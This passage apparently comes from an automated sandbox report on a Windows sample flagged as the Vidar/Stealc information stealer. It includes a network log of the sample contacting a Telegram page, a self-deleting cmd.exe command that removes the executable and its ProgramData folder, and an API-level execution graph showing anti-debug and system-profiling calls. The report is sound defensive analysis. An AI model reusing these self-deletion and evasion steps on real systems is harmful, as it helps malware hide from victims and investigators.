                                                                                                                                                                                                                                                  Data Ascii: /&quot;,&quot;CLAN_CDN_ASSET_URL&quot;:&quot;https:\/\/clan.cloudflare.steamstatic.com\/&quot;,&quot;SNR&quot;:&quot;2_100300_DefaultAction_&quot;}" data-userinfo="[]"></div><div id="application_config" style="display: none;" data-config="{&quot;EU


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                  1192.168.2.549725149.154.167.994433636C:\Users\user\Desktop\noll.exe
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  2024-12-18 10:37:37 UTC84OUTGET /ae5ed HTTP/1.1
                                                                                                                                                                                                                                                  Host: t.me
                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                  2024-12-18 10:37:37 UTC510INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Server: nginx/1.18.0
                                                                                                                                                                                                                                                  Date: Wed, 18 Dec 2024 10:37:37 GMT
                                                                                                                                                                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                  Content-Length: 9524
                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                  Set-Cookie: stel_ssid=5dff49e671e4ed2218_8487868024428388287; expires=Thu, 19 Dec 2024 10:37:37 GMT; path=/; samesite=None; secure; HttpOnly
                                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                                  Cache-control: no-store
                                                                                                                                                                                                                                                  X-Frame-Options: ALLOW-FROM https://web.telegram.org
                                                                                                                                                                                                                                                  Content-Security-Policy: frame-ancestors https://web.telegram.org
                                                                                                                                                                                                                                                  Strict-Transport-Security: max-age=35768000
                                                                                                                                                                                                                                                  2024-12-18 10:37:37 UTC9524INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 54 65 6c 65 67 72 61 6d 3a 20 43 6f 6e 74 61 63 74 20 40 61 65 35 65 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 3e 74 72 79 7b 69 66 28 77 69 6e 64 6f 77 2e 70 61 72 65 6e 74 21 3d 6e 75 6c 6c 26 26 77 69 6e 64 6f 77 21 3d 77 69 6e 64 6f 77 2e 70 61 72 65 6e 74 29 7b 77 69 6e 64 6f 77 2e 70 61 72 65 6e 74 2e
                                                                                                                                                                                                                                                  Data Ascii: <!DOCTYPE html><html> <head> <meta charset="utf-8"> <title>Telegram: Contact @ae5ed</title> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <script>try{if(window.parent!=null&&window!=window.parent){window.parent.


                                                                                                                                                                                                                                                  Click to jump to process

                                                                                                                                                                                                                                                  Click to jump to process

                                                                                                                                                                                                                                                  Click to dive into process behavior distribution

                                                                                                                                                                                                                                                  Click to jump to process

                                                                                                                                                                                                                                                  Target ID:0
                                                                                                                                                                                                                                                  Start time:05:37:09
                                                                                                                                                                                                                                                  Start date:18/12/2024
                                                                                                                                                                                                                                                  Path:C:\Users\user\Desktop\noll.exe
                                                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                                                  Commandline:"C:\Users\user\Desktop\noll.exe"
                                                                                                                                                                                                                                                  Imagebase:0x80000
                                                                                                                                                                                                                                                  File size:393'216 bytes
                                                                                                                                                                                                                                                  MD5 hash:D78F753A16D17675FB2AF71D58D479B0
                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                  Yara matches:
                                                                                                                                                                                                                                                  • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000000.00000000.2036904978.00000000000B0000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                  • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000000.2036904978.00000000000B0000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                  • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000000.2036904978.00000000000B0000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                  • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000000.00000002.2314042036.00000000000B0000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                  • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.2314042036.00000000000B0000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                  • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.2314042036.00000000000B0000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                  • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                  Target ID:3
                                                                                                                                                                                                                                                  Start time:05:37:37
                                                                                                                                                                                                                                                  Start date:18/12/2024
                                                                                                                                                                                                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                                                  Commandline:"C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\user\Desktop\noll.exe" & rd /s /q "C:\ProgramData\HJDHCFCBGIDG" & exit
                                                                                                                                                                                                                                                  Imagebase:0x790000
                                                                                                                                                                                                                                                  File size:236'544 bytes
                                                                                                                                                                                                                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                  Target ID:4
                                                                                                                                                                                                                                                  Start time:05:37:37
                                                                                                                                                                                                                                                  Start date:18/12/2024
                                                                                                                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                  Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                                                                  File size:862'208 bytes
                                                                                                                                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                  Target ID:5
                                                                                                                                                                                                                                                  Start time:05:37:37
                                                                                                                                                                                                                                                  Start date:18/12/2024
                                                                                                                                                                                                                                                  Path:C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                                                  Commandline:timeout /t 10
                                                                                                                                                                                                                                                  Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                                                                  File size:25'088 bytes
                                                                                                                                                                                                                                                  MD5 hash:976566BEEFCCA4A159ECBDB2D4B1A3E3
                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                  Reset < >

                                                                                                                                                                                                                                                    Execution Graph

                                                                                                                                                                                                                                                    Execution Coverage:13.7%
                                                                                                                                                                                                                                                    Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                                    Signature Coverage:4.8%
                                                                                                                                                                                                                                                    Total number of Nodes:2000
                                                                                                                                                                                                                                                    Total number of Limit Nodes:22
                                                                                                                                                                                                                                                    execution_graph 20734 9848d 20735 98494 20734->20735 20738 9d016 20735->20738 20737 984a9 20739 9d01e 20738->20739 20740 9d020 IsDebuggerPresent 20738->20740 20739->20737 20746 9d975 20740->20746 20743 9d460 SetUnhandledExceptionFilter UnhandledExceptionFilter 20744 9d47d __call_reportfault 20743->20744 20745 9d485 GetCurrentProcess TerminateProcess 20743->20745 20744->20745 20745->20737 20746->20743 20747 984ae 20748 984b0 20747->20748 20799 82b68 20748->20799 20757 81284 25 API calls 20758 984df 20757->20758 20759 81284 25 API calls 20758->20759 20760 984e9 20759->20760 20914 8148a GetPEB 20760->20914 20762 984f3 20763 81284 25 API calls 20762->20763 20764 984fd 20763->20764 20765 81284 25 API calls 20764->20765 20766 98507 20765->20766 20767 81284 25 API calls 20766->20767 20768 98511 20767->20768 20915 814a2 GetPEB 20768->20915 20770 9851b 20771 81284 25 API calls 20770->20771 20772 98525 20771->20772 20773 81284 25 API calls 20772->20773 20774 9852f 20773->20774 20775 81284 25 API calls 20774->20775 20776 98539 20775->20776 20916 814f9 20776->20916 20779 81284 25 API calls 20780 9854d 20779->20780 20781 81284 25 API calls 20780->20781 20782 98557 20781->20782 20783 81284 25 API calls 20782->20783 20784 98561 20783->20784 20939 81666 GetTempPathW 20784->20939 20787 81284 25 API calls 20788 98570 20787->20788 20789 81284 25 API calls 20788->20789 20790 9857a 20789->20790 20791 81284 25 API calls 20790->20791 20792 98584 20791->20792 20951 97041 20792->20951 21376 847e8 GetProcessHeap HeapAlloc 20799->21376 20802 847e8 3 API calls 20803 82b93 20802->20803 20804 847e8 3 API calls 20803->20804 20805 82bac 20804->20805 20806 847e8 3 API calls 20805->20806 20807 82bc3 20806->20807 20808 847e8 3 API calls 20807->20808 20809 82bda 20808->20809 20810 847e8 3 API calls 20809->20810 20811 82bf0 20810->20811 20812 847e8 3 API calls 20811->20812 20813 82c07 20812->20813 20814 847e8 3 API calls 20813->20814 20815 82c1e 20814->20815 20816 847e8 3 API calls 20815->20816 20817 82c38 20816->20817 20818 847e8 3 API calls 20817->20818 20819 82c4f 20818->20819 20820 847e8 3 API calls 20819->20820 20821 82c66 20820->20821 20822 847e8 3 API calls 20821->20822 20823 82c7d 20822->20823 20824 847e8 3 API calls 20823->20824 20825 82c93 20824->20825 20826 847e8 3 API calls 20825->20826 20827 82caa 20826->20827 20828 847e8 3 API calls 20827->20828 20829 82cc1 20828->20829 20830 847e8 3 API calls 20829->20830 20831 82cd8 20830->20831 20832 847e8 3 API calls 20831->20832 20833 82cf2 20832->20833 20834 847e8 3 API calls 20833->20834 20835 82d09 20834->20835 20836 847e8 3 API calls 20835->20836 20837 82d20 20836->20837 20838 847e8 3 API calls 20837->20838 20839 82d37 20838->20839 20840 847e8 3 API calls 20839->20840 20841 82d4e 20840->20841 20842 847e8 3 API calls 20841->20842 20843 82d65 20842->20843 20844 847e8 3 API calls 20843->20844 20845 82d7c 20844->20845 20846 847e8 3 API calls 20845->20846 20847 82d92 20846->20847 20848 847e8 3 API calls 20847->20848 20849 82dac 20848->20849 20850 847e8 3 API calls 20849->20850 20851 82dc3 20850->20851 20852 847e8 3 API calls 20851->20852 20853 82dda 20852->20853 20854 847e8 3 API calls 20853->20854 20855 82df1 20854->20855 20856 847e8 3 API calls 20855->20856 20857 82e07 20856->20857 20858 847e8 3 API calls 20857->20858 20859 82e1e 20858->20859 20860 847e8 3 API calls 20859->20860 20861 82e35 20860->20861 20862 847e8 3 API calls 20861->20862 20863 82e4c 20862->20863 20864 847e8 3 API calls 20863->20864 20865 82e66 20864->20865 20866 847e8 3 API calls 20865->20866 20867 82e7d 20866->20867 20868 847e8 3 API calls 20867->20868 20869 82e94 20868->20869 20870 847e8 3 API calls 20869->20870 20871 82eaa 20870->20871 20872 847e8 3 API calls 20871->20872 20873 82ec1 20872->20873 20874 847e8 3 API calls 20873->20874 20875 82ed8 20874->20875 20876 847e8 3 API calls 20875->20876 20877 82eec 20876->20877 20878 847e8 3 API calls 20877->20878 20879 82f03 20878->20879 20880 98643 20879->20880 21380 9859a GetPEB 20880->21380 20882 98649 20883 98844 LoadLibraryA LoadLibraryA LoadLibraryA LoadLibraryA LoadLibraryA 20882->20883 20884 98659 20882->20884 20885 988a3 GetProcAddress 20883->20885 20886 988b5 20883->20886 20891 98673 20 API calls 20884->20891 20885->20886 20887 988be GetProcAddress GetProcAddress 20886->20887 20888 988e7 20886->20888 20887->20888 20889 988f0 GetProcAddress 20888->20889 20890 98902 20888->20890 20889->20890 20892 9890b GetProcAddress 20890->20892 20893 9891d 20890->20893 20891->20883 20892->20893 20894 984c1 20893->20894 20895 98926 GetProcAddress GetProcAddress 20893->20895 20896 810f0 GetCurrentProcess VirtualAllocExNuma 20894->20896 20895->20894 20897 81098 VirtualAlloc 20896->20897 20898 81111 ExitProcess 20896->20898 20901 810b8 _memset 20897->20901 20900 810ec 20903 81284 20900->20903 20901->20900 20902 810d5 VirtualFree 20901->20902 20902->20900 20904 812ac _memset 20903->20904 20905 812bb 13 API calls 20904->20905 21381 90c85 GetProcessHeap HeapAlloc GetComputerNameA 20905->21381 20907 813e9 20909 9d016 DName::DName 5 API calls 20907->20909 20911 813f4 20909->20911 20911->20757 20912 813b9 20912->20907 20913 813e2 ExitProcess 20912->20913 20914->20762 20915->20770 21384 814ad GetPEB 20916->21384 20919 814ad 2 API calls 20920 81516 20919->20920 20921 814ad 2 API calls 20920->20921 20938 815a1 20920->20938 20922 81529 20921->20922 20923 814ad 2 API calls 20922->20923 20922->20938 20924 81538 20923->20924 20925 814ad 2 API calls 20924->20925 20924->20938 20926 81547 20925->20926 20927 814ad 2 API calls 20926->20927 20926->20938 20928 81556 20927->20928 20929 814ad 2 API calls 20928->20929 20928->20938 20930 81565 20929->20930 20931 814ad 2 API calls 20930->20931 20930->20938 20932 81574 20931->20932 20933 814ad 2 API calls 20932->20933 20932->20938 20934 81583 20933->20934 20935 814ad 2 API calls 20934->20935 20934->20938 20936 81592 20935->20936 20937 814ad 2 API calls 20936->20937 20936->20938 20937->20938 20938->20779 20940 817f7 20939->20940 20941 816a4 wsprintfW 20939->20941 20943 9d016 DName::DName 5 API calls 20940->20943 20942 816d0 CreateFileW 20941->20942 20942->20940 20944 816fb GetProcessHeap RtlAllocateHeap _time64 srand rand 20942->20944 20945 81807 20943->20945 20947 81754 _memset 20944->20947 20945->20787 20946 81733 WriteFile 20946->20940 20946->20947 20947->20940 20947->20946 20948 81768 CloseHandle CreateFileW 20947->20948 20950 817c3 GetProcessHeap RtlFreeHeap CloseHandle 20947->20950 20948->20940 20949 8179e ReadFile 20948->20949 20949->20940 20949->20947 20950->20940 20950->20942 20952 97051 20951->20952 21388 904e7 20952->21388 20956 97080 21393 90609 lstrlenA 20956->21393 20959 90609 3 API calls 20960 970a5 20959->20960 20961 90609 3 API calls 20960->20961 20962 970ae 20961->20962 21397 9058d 20962->21397 20964 970ba 20965 970e3 OpenEventA 20964->20965 20966 970dc CloseHandle 20965->20966 20967 970f6 CreateEventA 20965->20967 20966->20965 20968 904e7 lstrcpyA 20967->20968 20969 9711e 20968->20969 21401 90549 lstrlenA 20969->21401 20972 90549 2 API calls 20973 97185 20972->20973 21405 82f12 20973->21405 20976 98950 121 API calls 20977 972ca 20976->20977 20979 904e7 lstrcpyA 20977->20979 21182 9757f 20977->21182 20981 972e5 20979->20981 20983 90609 3 API calls 20981->20983 20982 9058d lstrcpyA 20984 975af 20982->20984 20985 972f7 20983->20985 20988 904e7 lstrcpyA 20984->20988 20986 9058d lstrcpyA 20985->20986 20987 97300 20986->20987 20990 90609 3 API calls 20987->20990 20989 975c6 20988->20989 20991 90609 3 API calls 20989->20991 20992 9731b 20990->20992 20993 975d9 20991->20993 20994 9058d lstrcpyA 20992->20994 21977 905c7 20993->21977 20996 97324 20994->20996 20999 90609 3 API calls 20996->20999 20998 9058d lstrcpyA 21001 975f2 20998->21001 21000 9733f 20999->21000 21002 9058d lstrcpyA 21000->21002 21003 97604 CreateDirectoryA 21001->21003 21004 97348 21002->21004 21981 81cfd 21003->21981 21008 90609 3 API calls 21004->21008 21010 97363 21008->21010 21009 9762e 22065 9824d 21009->22065 21011 9058d lstrcpyA 21010->21011 21013 9736c 21011->21013 21015 90609 3 API calls 21013->21015 21014 9763f 21016 9058d lstrcpyA 21014->21016 21017 97387 21015->21017 21018 97656 21016->21018 21019 9058d lstrcpyA 21017->21019 21020 9058d lstrcpyA 21018->21020 21021 97390 21019->21021 21022 97666 21020->21022 21026 90609 3 API calls 21021->21026 22072 90519 21022->22072 21025 90609 3 API calls 21027 97685 21025->21027 21028 973ab 21026->21028 21029 9058d lstrcpyA 21027->21029 21030 9058d lstrcpyA 21028->21030 21031 9768e 21029->21031 21032 973b4 21030->21032 21034 905c7 2 API calls 21031->21034 21033 90609 3 API calls 21032->21033 21035 973cf 21033->21035 21036 976ab 21034->21036 21037 9058d lstrcpyA 21035->21037 21038 9058d lstrcpyA 21036->21038 21039 973d8 21037->21039 21040 976b4 21038->21040 21042 90609 3 API calls 21039->21042 21041 976bd InternetOpenA InternetOpenA 21040->21041 21043 90519 lstrcpyA 21041->21043 21044 973f3 21042->21044 21045 97707 21043->21045 21046 9058d lstrcpyA 21044->21046 21047 904e7 lstrcpyA 21045->21047 21048 973fc 21046->21048 21049 97716 21047->21049 21053 90609 3 API calls 21048->21053 22076 909a2 GetWindowsDirectoryA 21049->22076 21052 90519 lstrcpyA 21054 97731 21052->21054 21055 97417 21053->21055 22094 84b2e 21054->22094 21057 9058d lstrcpyA 21055->21057 21059 97420 21057->21059 21062 90609 3 API calls 21059->21062 21061 97744 21064 904e7 lstrcpyA 21061->21064 21063 9743b 21062->21063 21065 9058d lstrcpyA 21063->21065 21066 97779 21064->21066 21067 97444 21065->21067 21068 81cfd lstrcpyA 21066->21068 21071 90609 3 API calls 21067->21071 21069 9778a 21068->21069 22245 85f39 21069->22245 21074 9745f 21071->21074 21076 9058d lstrcpyA 21074->21076 21075 977a2 21077 904e7 lstrcpyA 21075->21077 21078 97468 21076->21078 21079 977b6 21077->21079 21082 90609 3 API calls 21078->21082 21080 81cfd lstrcpyA 21079->21080 21081 977c0 21080->21081 21083 85f39 43 API calls 21081->21083 21084 97483 21082->21084 21086 977cc 21083->21086 21085 9058d lstrcpyA 21084->21085 21087 9748c 21085->21087 22419 93259 strtok_s 21086->22419 21091 90609 3 API calls 21087->21091 21089 977df 21090 904e7 lstrcpyA 21089->21090 21092 977f2 21090->21092 21093 974a7 21091->21093 21094 81cfd lstrcpyA 21092->21094 21095 9058d lstrcpyA 21093->21095 21096 97803 21094->21096 21097 974b0 21095->21097 21098 85f39 43 API calls 21096->21098 21102 90609 3 API calls 21097->21102 21099 9780f 21098->21099 22428 93390 strtok_s 21099->22428 21101 97822 21103 81cfd lstrcpyA 21101->21103 21104 974cb 21102->21104 21105 97833 21103->21105 21106 9058d lstrcpyA 21104->21106 22435 93b86 21105->22435 21108 974d4 21106->21108 21111 90609 3 API calls 21108->21111 21109 97838 21110 90519 lstrcpyA 21109->21110 21112 97849 21110->21112 21113 974ef 21111->21113 21114 904e7 lstrcpyA 21112->21114 21115 9058d lstrcpyA 21113->21115 21116 97857 21114->21116 21117 974f8 21115->21117 22773 85237 21116->22773 21121 90609 3 API calls 21117->21121 21120 81cfd lstrcpyA 21122 97873 21120->21122 21123 97513 21121->21123 22793 8eabc 21122->22793 21125 9058d lstrcpyA 21123->21125 21128 9751c 21125->21128 21136 90609 3 API calls 21128->21136 21140 97537 21136->21140 21144 9058d lstrcpyA 21140->21144 21149 97540 21144->21149 21156 90609 3 API calls 21149->21156 21160 9755b 21156->21160 21164 9058d lstrcpyA 21160->21164 21168 97564 21164->21168 21960 9257f 21168->21960 21969 91c4a 21182->21969 21189 9cc6c 10 API calls 21189->21182 21377 8480f 21376->21377 21378 82b7c 21376->21378 21379 84818 lstrlenA 21377->21379 21378->20802 21379->21378 21379->21379 21380->20882 21382 81385 21381->21382 21382->20907 21383 90c53 GetProcessHeap HeapAlloc GetUserNameA 21382->21383 21383->20912 21385 814e9 21384->21385 21386 814d9 lstrcmpiW 21385->21386 21387 814ef 21385->21387 21386->21385 21386->21387 21387->20919 21387->20938 21389 904f2 21388->21389 21390 90513 21389->21390 21391 90509 lstrcpyA 21389->21391 21392 90c53 GetProcessHeap HeapAlloc GetUserNameA 21390->21392 21391->21390 21392->20956 21395 90630 21393->21395 21394 90656 21394->20959 21395->21394 21396 90643 lstrcpyA lstrcatA 21395->21396 21396->21394 21399 9059c 21397->21399 21398 905c3 21398->20964 21399->21398 21400 905bb lstrcpyA 21399->21400 21400->21398 21402 9055e 21401->21402 21403 90587 21402->21403 21404 9057d lstrcpyA 21402->21404 21403->20972 21404->21403 21406 847e8 3 API calls 21405->21406 21407 82f27 21406->21407 21408 847e8 3 API calls 21407->21408 21409 82f3e 21408->21409 21410 847e8 3 API calls 21409->21410 21411 82f55 21410->21411 21412 847e8 3 API calls 21411->21412 21413 82f6c 21412->21413 21414 847e8 3 API calls 21413->21414 21415 82f85 21414->21415 21416 847e8 3 API calls 21415->21416 21417 82f9c 21416->21417 21418 847e8 3 API calls 21417->21418 21419 82fb3 21418->21419 21420 847e8 3 API calls 21419->21420 21421 82fca 21420->21421 21422 847e8 3 API calls 21421->21422 21423 82fe4 21422->21423 21424 847e8 3 API calls 21423->21424 21425 82ffb 21424->21425 21426 847e8 3 API calls 21425->21426 21427 83011 21426->21427 21428 847e8 3 API calls 21427->21428 21429 83028 21428->21429 21430 847e8 3 API calls 21429->21430 21431 8303f 21430->21431 21432 847e8 3 API calls 21431->21432 21433 83056 21432->21433 21434 847e8 3 API calls 21433->21434 21435 8306d 21434->21435 21436 847e8 3 API calls 21435->21436 21437 83084 21436->21437 21438 847e8 3 API calls 21437->21438 21439 8309b 21438->21439 21440 847e8 3 API calls 21439->21440 21441 830b2 21440->21441 21442 847e8 3 API calls 21441->21442 21443 830c9 21442->21443 21444 847e8 3 API calls 21443->21444 21445 830df 21444->21445 21446 847e8 3 API calls 21445->21446 21447 830f6 21446->21447 21448 847e8 3 API calls 21447->21448 21449 8310f 21448->21449 21450 847e8 3 API calls 21449->21450 21451 83123 21450->21451 21452 847e8 3 API calls 21451->21452 21453 8313a 21452->21453 21454 847e8 3 API calls 21453->21454 21455 83154 21454->21455 21456 847e8 3 API calls 21455->21456 21457 8316b 21456->21457 21458 847e8 3 API calls 21457->21458 21459 83182 21458->21459 21460 847e8 3 API calls 21459->21460 21461 83199 21460->21461 21462 847e8 3 API calls 21461->21462 21463 831af 21462->21463 21464 847e8 3 API calls 21463->21464 21465 831c5 21464->21465 21466 847e8 3 API calls 21465->21466 21467 831dc 21466->21467 21468 847e8 3 API calls 21467->21468 21469 831f2 21468->21469 21470 847e8 3 API calls 21469->21470 21471 8320c 21470->21471 21472 847e8 3 API calls 21471->21472 21473 83223 21472->21473 21474 847e8 3 API calls 21473->21474 21475 8323a 21474->21475 21476 847e8 3 API calls 21475->21476 21477 83250 21476->21477 21478 847e8 3 API calls 21477->21478 21479 83267 21478->21479 21480 847e8 3 API calls 21479->21480 21481 8327e 21480->21481 21482 847e8 3 API calls 21481->21482 21483 83295 21482->21483 21484 847e8 3 API calls 21483->21484 21485 832ab 21484->21485 21486 847e8 3 API calls 21485->21486 21487 832c2 21486->21487 21488 847e8 3 API calls 21487->21488 21489 832d9 21488->21489 21490 847e8 3 API calls 21489->21490 21491 832f0 21490->21491 21492 847e8 3 API calls 21491->21492 21493 83306 21492->21493 21494 847e8 3 API calls 21493->21494 21495 8331c 21494->21495 21496 847e8 3 API calls 21495->21496 21497 83333 21496->21497 21498 847e8 3 API calls 21497->21498 21499 83349 21498->21499 21500 847e8 3 API calls 21499->21500 21501 8335d 21500->21501 21502 847e8 3 API calls 21501->21502 21503 83374 21502->21503 21504 847e8 3 API calls 21503->21504 21505 8338a 21504->21505 21506 847e8 3 API calls 21505->21506 21507 833a1 21506->21507 21508 847e8 3 API calls 21507->21508 21509 833b8 21508->21509 21510 847e8 3 API calls 21509->21510 21511 833cf 21510->21511 21512 847e8 3 API calls 21511->21512 21513 833e6 21512->21513 21514 847e8 3 API calls 21513->21514 21515 833fd 21514->21515 21516 847e8 3 API calls 21515->21516 21517 83414 21516->21517 21518 847e8 3 API calls 21517->21518 21519 8342e 21518->21519 21520 847e8 3 API calls 21519->21520 21521 83445 21520->21521 21522 847e8 3 API calls 21521->21522 21523 8345c 21522->21523 21524 847e8 3 API calls 21523->21524 21525 83473 21524->21525 21526 847e8 3 API calls 21525->21526 21527 8348a 21526->21527 21528 847e8 3 API calls 21527->21528 21529 834a1 21528->21529 21530 847e8 3 API calls 21529->21530 21531 834b8 21530->21531 21532 847e8 3 API calls 21531->21532 21533 834cf 21532->21533 21534 847e8 3 API calls 21533->21534 21535 834e9 21534->21535 21536 847e8 3 API calls 21535->21536 21537 83500 21536->21537 21538 847e8 3 API calls 21537->21538 21539 83517 21538->21539 21540 847e8 3 API calls 21539->21540 21541 8352e 21540->21541 21542 847e8 3 API calls 21541->21542 21543 83545 21542->21543 21544 847e8 3 API calls 21543->21544 21545 8355c 21544->21545 21546 847e8 3 API calls 21545->21546 21547 83573 21546->21547 21548 847e8 3 API calls 21547->21548 21549 8358a 21548->21549 21550 847e8 3 API calls 21549->21550 21551 835a4 21550->21551 21552 847e8 3 API calls 21551->21552 21553 835bb 21552->21553 21554 847e8 3 API calls 21553->21554 21555 835d2 21554->21555 21556 847e8 3 API calls 21555->21556 21557 835e9 21556->21557 21558 847e8 3 API calls 21557->21558 21559 83600 21558->21559 21560 847e8 3 API calls 21559->21560 21561 83617 21560->21561 21562 847e8 3 API calls 21561->21562 21563 8362d 21562->21563 21564 847e8 3 API calls 21563->21564 21565 83643 21564->21565 21566 847e8 3 API calls 21565->21566 21567 8365d 21566->21567 21568 847e8 3 API calls 21567->21568 21569 83674 21568->21569 21570 847e8 3 API calls 21569->21570 21571 8368b 21570->21571 21572 847e8 3 API calls 21571->21572 21573 836a1 21572->21573 21574 847e8 3 API calls 21573->21574 21575 836b8 21574->21575 21576 847e8 3 API calls 21575->21576 21577 836cf 21576->21577 21578 847e8 3 API calls 21577->21578 21579 836e3 21578->21579 21580 847e8 3 API calls 21579->21580 21581 836f9 21580->21581 21582 847e8 3 API calls 21581->21582 21583 83713 21582->21583 21584 847e8 3 API calls 21583->21584 21585 8372a 21584->21585 21586 847e8 3 API calls 21585->21586 21587 83741 21586->21587 21588 847e8 3 API calls 21587->21588 21589 83758 21588->21589 21590 847e8 3 API calls 21589->21590 21591 8376f 21590->21591 21592 847e8 3 API calls 21591->21592 21593 83786 21592->21593 21594 847e8 3 API calls 21593->21594 21595 8379a 21594->21595 21596 847e8 3 API calls 21595->21596 21597 837b1 21596->21597 21598 847e8 3 API calls 21597->21598 21599 837cb 21598->21599 21600 847e8 3 API calls 21599->21600 21601 837e2 21600->21601 21602 847e8 3 API calls 21601->21602 21603 837f6 21602->21603 21604 847e8 3 API calls 21603->21604 21605 8380a 21604->21605 21606 847e8 3 API calls 21605->21606 21607 83821 21606->21607 21608 847e8 3 API calls 21607->21608 21609 83838 21608->21609 21610 847e8 3 API calls 21609->21610 21611 8384f 21610->21611 21612 847e8 3 API calls 21611->21612 21613 83866 21612->21613 21614 847e8 3 API calls 21613->21614 21615 83880 21614->21615 21616 847e8 3 API calls 21615->21616 21617 83897 21616->21617 21618 847e8 3 API calls 21617->21618 21619 838ae 21618->21619 21620 847e8 3 API calls 21619->21620 21621 838c5 21620->21621 21622 847e8 3 API calls 21621->21622 21623 838db 21622->21623 21624 847e8 3 API calls 21623->21624 21625 838f2 21624->21625 21626 847e8 3 API calls 21625->21626 21627 83906 21626->21627 21628 847e8 3 API calls 21627->21628 21629 8391d 21628->21629 21630 847e8 3 API calls 21629->21630 21631 83937 21630->21631 21632 847e8 3 API calls 21631->21632 21633 8394e 21632->21633 21634 847e8 3 API calls 21633->21634 21635 83965 21634->21635 21636 847e8 3 API calls 21635->21636 21637 8397c 21636->21637 21638 847e8 3 API calls 21637->21638 21639 83993 21638->21639 21640 847e8 3 API calls 21639->21640 21641 839aa 21640->21641 21642 847e8 3 API calls 21641->21642 21643 839c1 21642->21643 21644 847e8 3 API calls 21643->21644 21645 839d8 21644->21645 21646 847e8 3 API calls 21645->21646 21647 839f2 21646->21647 21648 847e8 3 API calls 21647->21648 21649 83a09 21648->21649 21650 847e8 3 API calls 21649->21650 21651 83a20 21650->21651 21652 847e8 3 API calls 21651->21652 21653 83a37 21652->21653 21654 847e8 3 API calls 21653->21654 21655 83a4e 21654->21655 21656 847e8 3 API calls 21655->21656 21657 83a65 21656->21657 21658 847e8 3 API calls 21657->21658 21659 83a7c 21658->21659 21660 847e8 3 API calls 21659->21660 21661 83a90 21660->21661 21662 847e8 3 API calls 21661->21662 21663 